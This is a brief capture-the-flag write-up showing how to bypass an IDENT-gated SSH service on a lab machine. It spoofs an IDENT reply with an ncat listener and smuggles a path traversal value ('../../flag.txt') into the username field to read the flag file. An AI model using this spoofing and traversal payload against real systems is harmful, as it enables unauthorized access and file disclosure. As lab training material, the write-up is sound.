notes (1631B)
1Connect to the service 2 3By running `find /` we find out the flag file is in /flag.txt, 4but the correct contents are on the victim machine we can access 5via `ssh -p 2000 localhost`. 6 7Use `ssh -p 2000 localhost` to connect and get the following error: 8 9Connection to localhost (::1) 2000 port [tcp/*] succeeded! 10######################################################################### 11# # 12# Unknown User! # 13# # 14######################################################################### 15TCP Wrappers: Connection refused! Make sure that port 113 can be reached! 16User: unknown 17Client: ::1 18Hostname: localhost 19Date: Thu Mar 14 19:50:09 UTC 2024 20 21We open up port 113 using `ncat -6 -l -p 113` (ipv6 based on description hint) 22 23Next time we connect we get a single line from the victim: 2436362,2000 25 26Googling "service port 113" we find that this is the port for the IDENT 27service which when given a src,dst port pair returns the user initiating 28the connection. 29 30If we connect again and reply with `36362,2000 : USERID : UNIX : root` 31we get the following instead: 32 33cat: /tmp/users/root: No such file or directory 34 35TCP Wrappers: Hello root ! 36User: root 37Client: ::1 38Hostname: localhost 39Date: Thu Mar 14 19:49:50 UTC 2024 40 41So for some reason, the user is used in a shell command to cat a file... 42 43Using path traversal we can read the flag: 44 45XXXXX,2000 : USERID : UNIX : ../../flag.txt 46